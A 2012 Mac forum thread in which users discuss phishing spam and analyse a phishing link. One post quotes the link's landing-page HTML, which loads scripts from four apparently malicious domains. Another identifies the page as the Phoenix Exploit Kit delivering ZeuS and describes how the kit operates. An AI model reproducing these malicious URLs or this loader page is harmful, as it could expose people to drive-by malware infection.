An open community 
of Macintosh users,
for Macintosh users.

FineTunedMac Dashboard widget now available! Download Here

Topic Options
#21059 - 03/13/12 09:01 AM anyone else getting Smith Micro spam?
Virtual1 Offline


Registered: 08/04/09
Loc: Iowa
I make new addresses for the different businesses I email to, so I can tell who is responsible for spam and phishing.

I started receiving phishing emails a few days ago to the address I created for emailing Smith Micro. I think they're the ones that bought out Stuffit? Anyone else getting these?

Both times in the past I've tried to call and complain about someone getting me on a spam/phish list (Ford and NewEgg most recently) they've denied the possibility of any involvement. (not surprising I suppose)


Edited by cyn (03/16/12 09:50 AM)
Edit Reason: Topic moved from the Lounge to the Networking forum.
_________________________
I work for the Department of Redundancy Department

Top
#21082 - 03/15/12 10:09 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
tacit Offline


Registered: 08/03/09
Loc: Portland, Oregon, USA
Generally speaking, if you start getting spam to an email address, therre are a few possibilities:

- The spammers found it on a Web site, forum, or email group.
- The spammers found it by doing a dictionary attack.
- You used it on a Web site or online ordering system that was hacked.
- You gave it to someone who gave, sold, or rented it to the spammers.
- You gave it to someone who was then hacked.
- You gave it to someone who is infected with an email-scraping virus.

If this email was created only for Smith Micro, that rules out the first two possibilities, leaving only the bottom four. Smith Micro probably didn't intentionally sell it on to phishers, which means they have been hacked, they are using a computer infected with a virus, or the spammers found the email address by using a brute-force dictionary attack.

How unusual is the email address? Does it use dictionary words?
_________________________
Photo gallery, all about me, and more: www.xeromag.com/franklin.html

Top
#21083 - 03/15/12 10:14 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
Virtual1 Offline


Registered: 08/04/09
Loc: Iowa
I typically use "v1" and the company name, @vftp.net as my alias. I obviously don't post it publicly. The prepending of "v1" to the start of the addresses makes them fairly resistant to dictionary attacks. I've checked my server logs a few times in the past looking for such mischief and other than the expected dictionary attempts I don't see much.

So I follow the same conclusion as you, hacked or botnetted. Either way probably a waste of my time to contact them, they're unlikely to admit to either.
_________________________
I work for the Department of Redundancy Department

Top
#21091 - 03/16/12 07:08 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
Virtual1 Offline


Registered: 08/04/09
Loc: Iowa
And I continue to get spam that looks like my "intuit order" is ready. Spam emails originate from Tunisia. The link tries to get me to go here:

http//livonya.com/BNCGCPNP/index.html
(attempting to autolink that url was not appreciated, ubb)

which does a really odd thing, it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

Or maybe a cocktail? Curling that URL gives:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>
_________________________
I work for the Department of Redundancy Department

Top
#21095 - 03/16/12 10:17 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
tacit Offline


Registered: 08/03/09
Loc: Portland, Oregon, USA
It's the Phoenix Exploit Kit.

The Web site looks at the browser, platform, plugins, and other configuration information, then attempts a cocktail of browser, Java, Flash, and PDF exploits to download the W32/ZeuS malware. I've been seeing a lot of these lately.

W32/ZeuS is a modular, programmable, configurable malware strain that's sold in underground carder communities as a do-it-yourself kit. Once it infects a computer, it waits silently until a person attempts to visit a bank site or a site like PayPal. When that happens, it begins keystroke logging and then sends the person's login credentials to a server under the control of the person who set it up. It uses advanced encryption and other techniques to mask its communication with the server.

Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.
_________________________
Photo gallery, all about me, and more: www.xeromag.com/franklin.html

Top
#21096 - 03/16/12 10:44 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
artie505 Online


Registered: 08/04/09
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.


Edited by artie505 (03/16/12 11:06 AM)
_________________________
The new Great Equalizer is the SEND button.

In Memory Of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire

Top
#21097 - 03/16/12 11:14 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
artie505 Online


Registered: 08/04/09
> [...] it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

After seeing that it's Windows only I entered the URL and was taken to what looks like a clothing sales site.

The home page displayed a log-in pane with name and password pre-entered, which I wasn't curious enough to click on.
_________________________
The new Great Equalizer is the SEND button.

In Memory Of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire

Top
#21098 - 03/16/12 03:35 PM Re: anyone else getting Smith Micro spam? [Re: artie505]
artie505 Online


Registered: 08/04/09
I forgot to mention in my last post that somewhere on the road to that shopping site I acquired a microsoft.com cookie. Curious?
_________________________
The new Great Equalizer is the SEND button.

In Memory Of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire

Top
#21100 - 03/17/12 02:35 AM Re: anyone else getting Smith Micro spam? [Re: artie505]
ryck Offline


Registered: 08/04/09
Loc: Okanagan Valley
I'd label it curious. I just checked my cookies and, although I have various Microsoft sites I visit (due to needing support for my Office software), I do not have a cookie called microsoft.com.
_________________________
ryck

iMac (Retina 5K, 27", 2017), 3.4 GHz Intel Core i5, 8GB RAM, 2400 MHz DDR4
OS Mojave 10.14.6
Canon MX710 Printer
Epson Perfection V500 Photo Scanner
Carbon Copy Clone on 1TB LaCie USB-C
Carbon Copy Clone on 500GB OWC Mercury OTG Pro

Top
#21116 - 03/19/12 08:44 AM Re: anyone else getting Smith Micro spam? [Re: artie505]
Virtual1 Offline


Registered: 08/04/09
Loc: Iowa
Originally Posted By: artie505
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.


AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.
_________________________
I work for the Department of Redundancy Department

Top
#21117 - 03/19/12 08:46 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
Virtual1 Offline


Registered: 08/04/09
Loc: Iowa
Originally Posted By: tacit
Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.


Wow. I didn't know that. What do you do then? reformat and restore safe documents?
_________________________
I work for the Department of Redundancy Department

Top
#21155 - 03/22/12 12:03 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
tacit Offline


Registered: 08/03/09
Loc: Portland, Oregon, USA
Originally Posted By: Virtual1
AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.


Yep. There are several exploit kits that are shopped around to malware writers to help them spread their malware, the two most common being the Blackhole Exploit Kit and the Phoenix Exploit Kit. Both can be configured to drop any malware (not just ZeuS) and both can be configured to send the user elsewhere if the exploits all fail or if the page is loaded in a way that the malware writer doesn't want.

For example, the Phoenix Exploit Kit is often configured in such a way that if you surf to it directly it'll redirect elsewhere; it attempts the exploit if it's loaded in an iFrame. The bad guys then compromise other sites and inject iFrames into them.

Originally Posted By: Virtual1
Wow. I didn't know that. What do you do then? reformat and restore safe documents?


Yep. Microsoft Security Essentials can remove some of the older variants of ZeuS, but for modern variants, or for some other similar malware? Yep, reformat and restore is Microsoft's recommended course of action.
_________________________
Photo gallery, all about me, and more: www.xeromag.com/franklin.html

Top

Moderator:  alternaut, dianne, MacManiac